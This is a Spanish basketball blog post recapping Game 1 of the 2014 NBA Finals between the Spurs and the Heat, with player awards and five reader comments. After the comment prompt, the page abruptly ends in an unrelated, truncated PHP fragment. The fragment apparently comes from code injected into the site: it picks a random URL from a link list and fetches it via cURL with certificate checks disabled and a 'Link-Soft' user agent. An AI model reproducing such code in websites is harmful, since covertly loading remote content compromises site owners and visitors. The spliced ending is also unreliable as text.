La Crónica: Lucha contra los elementos

06 de June de 2014 por TheDeerHunter

Lo nunca visto. Problemas físicos de LeBron James que cuestan la primera derrota a los Heat. El alero de Miami se vio obligado a abandonar la cancha en el último cuarto martirizado por los calambres cuando su equipo parecía tener bien encarrilado el partido. Ni siquiera pudo llegar al banco por su propio pie. Había tratado de resistir el dolor realizando descansos cortos pero los Spurs arrasaban durante esos minutos y Lebron tuvo que forzar hasta que no pudo más. El parcial en la recta final, desde que comenzaron sus molestias, fue de 31-9. No hay ventaja que soporte tal castigo. Sin LeBron, aunque sea cuestión de minutos, los Heat no son rival para estos Spurs.

Antes que eso los Heat habían puesto el AT&T Center al rojo vivo. No es un juego de palabras, es literal. Un fallo en el sistema de aire acondicionado convirtió el pabellón en una sauna. Los Spurs se metían en graves problemas por culpa de un número inaceptable de pérdidas de balón, como ya avisábamos en la previa. Los Heat hacían pagar caro cada error y un 3+1 de Chris Bosh les daba 7 puntos ventaja, la máxima a su favor, a 9 minutos del final. A partir de ahí el descenso a los infiernos que ya hemos comentado. A pesar de todo, excelente partido del propio LeBron antes de su retirada prematura, de Dwyane Wade y Chris Bosh, como también de Rashard Lewis que salió de titular y de Ray Allen que se infló a robar balones. Sólo desentonó Mario Chalmers, cargado de faltas todo el partido.

Por los Spurs, quitando el problema de las pérdidas, todo fantástico. Obviamente la lectura sería distinta de haber perdido pero dominaron la mayor parte de aspectos clave. Porcentaje de acierto, rebotes, asistencias… Extraordinario su Big Three de viejos pretorianos. Gran contribución de Boris Diaw en la intendencia (nada menos que +30 con él en cancha) y también de Tiago Splitter manteniendo a la segunda unidad en los momentos de mayor desconcierto (final del tercer cuarto y comienzo del último). La actuación de Kawhi Leonard y Danny Green fue vital en la remontada pero resulta algo engañosa. Hasta la lesión de LeBron fue verdaderamente discreta y sus defensas sobre Wade y el propio James no fueron tan eficaces como en otras ocasiones.

Primer punto para los aspirantes aunque con algunas reservas. Los Heat llevaron el duelo a su terreno siendo superiores en varios tramos. Esto no ha hecho nada más que comenzar (95-110). 

PREMIOS

MVP: El Big Three de los Spurs en general y Manu Ginobili en particular. El argentino anotó 16 puntos pero más importante, repartió 11 asistencias y robó 3 balones.

Sorpresa: Hasta 5 balones robó Ray Allen que alcanzó 16 puntos que adornó con 3 rebotes y 3 asistencias. Un partido completísimo del veteranísimo escolta de los Heat.

Decepción: En un bando, Mario Chalmers que se quedó en 3 puntos y perdió 5 balones. En el otro, Kawhi Leonard, que no pudo parar a Lebron y anotó sólo 9 puntos a la vez que cometía 4 pérdidas.

Esfuerzo en vano: Lebron James intentó mantener en la cancha por todos los medios pero incluso un titán como él ha de decir basta en algún momento. Al final se quedó en 33 minutos pero le dio a tiempo a anotar 25 puntos y capturar 6 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Pinta a finales muy muy largas como el año pasado. Hasta las molestias de Lebron el partido estuvo en un puño, con los Spurs teniendo que tirar de todas sus piezas para aguantar el ritmo del Big Three de Miami.

    Los pocos minutos que descansen Lebron&Wade serán claves, ya que ahí es cuando los Spurs deben sacar buenas ventajas. Miami por su parte necesita cerrar bien el rebote ya que no necesitan excesiva ventaja para jugar transiciones rápidas.

    Y mi amor eterno para Tim Duncan, no se si se lo había declarado ya en público, pero que jugón, que máquina, que MITO!!!!!

      Citar

  2. rumbero dice:
    #2

    Pues partidazo para para abrir la serie como no podía ser de otra manera. Como comentáis el partido estuvo muy abierto hasta la lesión de Lebron. Incluso parecía algo más favorable a Miami que imponía su defensa y donde aparecían Bosh y un Allen con 15 años menos. Lo increíble era que los Spurs sobrevivieran a 23 pérdidas (un poema las caras de Pop) gracias a un tremendo acierto en el tiro y control del rebote. Luego ya sin el King, se soltó Danny Green y el resto para cerrar el partido. Tremendo lo de Diaw si. Esto va para largo y bonito

      Citar

  3. GreenPride dice:
    #3

    Bueno pues increible pero en un partido donde por el calor el físico podía decidir, resulta que el jugador más físico del planeta es el que petó y acabó siendo efectivamente decisivo.
    Antes de la lesión de LeBron, vimos lo que pueden ser estas series. Dos equipos que se conocen y que saben como hacer daño a las defensas contrarias, partido super igualado con casi todos los grandes jugadores haciendo buenos números y pequeños detalles que deberían decidir cada partido. Vamos que pueden ser unas series memorables de no mediar más lesiones.
    Hasta el momento de la lesión de LeBron habíamos visto un partido super interesante. Por un lado vimos al mejor Wade aprovechando su rapidez para crear canastas, un buen Bosh en ataque, a LeBron pudiendo con el manazas, a los secundarios de los Heat haciendo su trabajo y aprovechando los espacios creados y por parte texana los problemas que crean Diaw, Splitter y Duncan a la defensa Heat y cómo abren campo para un fenomenal Manudona y para los tiradores (Belinelli, Mills y demás).
    Además hemos visto que mientras los Heat se desmoronaron sin LeBron, los Spurs se sobreponen y compiten con Parker mermado y Leonard en uno de sus peores partidos de los PO, es decir lo que ya sabíamos que LeBron va a tener que hacer unas series macanudas y tener ayuda de sus compañeros (cosa que había tenido en este partido) para llevarse las series.
    Dicho lo cual este partido iba más camino de que se lo llevase Miami hasta la lesión de LeBron lo que nos abre en teoría a una series que deberían ser largas.
    LeBron siempre perdió el primer partido de las finales que jugó (y con esta van 5) pero ganó la mitad de ellas así que veremos si acaba desempatando para bien o para mal….

      Citar

  4. Ruxixon dice:
    #4

    El partido como playmaker de Ginobili de muy alto nivel,aún así Miami estuvo siempre en el partido,aprovechando las numerosas pérdidas de San Antonio.Fue lesionarse LeBron y los vasos comunicantes de los ánimos de cada equipo empujaron a los Spurs a una victoria demasiada engañosa.Espero que LeBron pueda estar al máximo en el próximo partido.

    Por cierto,¿se confirma lo de Saunders como entrenador de los Timberwolves?Me parece una pésima noticia.

      Citar

  5. Mamba_Blanca dice:
    #5

    ¿Algún valiente estará por aqui esta noche?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>